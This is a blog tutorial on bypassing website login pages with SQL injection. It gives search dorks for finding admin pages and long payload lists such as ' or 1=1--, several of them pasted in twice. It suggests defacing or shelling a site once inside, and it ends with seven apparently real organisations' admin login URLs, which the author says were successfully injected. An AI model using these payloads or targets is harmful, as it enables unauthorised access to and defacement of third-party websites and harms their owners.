chapter 2
Requirements: Patience and stradegy
Alright in this tutorial, we'll be learning how to bypass login pages with the help of MySequel injection using Login Queries.
Please visit Chapter 1 if you haven't seen it yet: http://htu-2.blogspot.com/2013/06/dork-for-sql-injection.html
What is SQL injection?
Answer: Basically, it's a process where you execute a certain query in a website in order to extract information such as log-in information, users etc. for either personal gain or random use from the website's database.
There are many type of certain queries that can be executed in order to illegally extract information from the website's database.
In this tutorial the query we'll be using is Basic SQL injection query where it can be executed in a login page.
Example:
==============================================
Username: admin
Password: ‘ or ‘1’=’1
==============================================
When you enter the password "‘or ‘1’=’1" in most website, there's a chance you can gain access.
How does it happen? Look at the code when we execute that query
==============================================
SELECT * FROM users
WHERE username = ‘admin’
AND password = ‘ ‘ or ‘1’=’1’
==============================================
In the password field, we inserted a quote ' first, then a bunch of random characters like "1".
The database always scans for rows and hence in the query we have executed, there's only 1 row which states that there's no reason for the login to be incorrect.
However, some websites can filter out these type of queries, so it's best to use different ones too. You can find some below
Now that you have an idea of how Basic SQL injection queries work, lets try and put it to use shall we
Step1: Finding websites with Login Pages
Alright, out basic approach is to find a couple of websites with login pages so that we can execute our query in order to bypass it.
For this, we can use dorks.
If you don't know how to use dorks or have no idea about it, please visit my previous tutorial:
If you don't know how to use dorks or have no idea about it, please visit my previous tutorial:
In this tutorial, we can use these dorks:
==============================================
Code:
inurl:/login.php
inurl:/admin.php
inurl:/admin
inurl:/login.html
==============================================
Step2: Now Executing the query
Alright, now that you've found your target with a log in page, lets play with it a bit.
So here's what you're gonna do
Username will be admin, cause most sites are having admin data stored in their databases
===============================================
Code:
Username: admin
Password: ' or 0=0 --
===============================================
Didn't work? No worries, there's more to that than just a single query
Here's a list of queried passwords you can use to hopefully inject the site.
==================================================
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
Step2: Now Executing the query
Alright, now that you've found your target with a log in page, lets play with it a bit.
So here's what you're gonna do
Username will be admin, cause most sites are having admin data stored in their databases
===============================================
Code:
Username: admin
Password: ' or 0=0 --
===============================================
Didn't work? No worries, there's more to that than just a single query
Here's a list of queried passwords you can use to hopefully inject the site.
==================================================
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==
and 1=1--
and 1=1
' or 'one'='one--
' or 'one'='one
' and 'one'='one
' and 'one'='one--
1') and '1'='1--
admin' --
admin' #
admin'/*
or 1=1--
or 1=1#
or 1=1/*
) or '1'='1--
) or ('1'='1--
' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
==================================================
=
Note: Sometimes, this is not the best way of hacking websites with SQL injection but I guarantee, you'll be a successful patient SQL injector and get used to this method.
Step3: I LOGGED in, what to do now?!
Well, first off, if you did login, then congratz on your first successful attempt of SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it
Others will just shell it and have other uses such as rooting, webhosting etc.
If would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon
Now you might wanna watch the video so that you'll get the idea of how I login as an Administrator on a SQLi vulnerable website
Extras:
Common Password Queries:
===============================================
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
=
Note: Sometimes, this is not the best way of hacking websites with SQL injection but I guarantee, you'll be a successful patient SQL injector and get used to this method.
Step3: I LOGGED in, what to do now?!
Well, first off, if you did login, then congratz on your first successful attempt of SQL injection.
So, there are basically many things you can do with the site.
Most people would love to deface it
Others will just shell it and have other uses such as rooting, webhosting etc.
If would like to deface the website, locate the homepage and replace it with your deface page.
A tutorial of mine on how to deface a page will be coming soon
Now you might wanna watch the video so that you'll get the idea of how I login as an Administrator on a SQLi vulnerable website
Extras:
Common Password Queries:
===============================================
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
===============================================
Here are some sites you can test on:
Code:
http://www.amskrupajal.org/AdminLogin.asp
http://www.csimatrichss.org/adminpage.asp
http://www.preventivecardiology.in/adminlogin.asp
http://pndllc.com/pndllc/admin/adminlogin.asp
http://www.singleusemedical.com/admin/adminLogin.asp
http://www.ringjordan.com/admin.asp
http://sunmarytrust.org/adminlogin.aspI tried injecting all of them and it worked, so it should work for you too
0 comments:
Post a Comment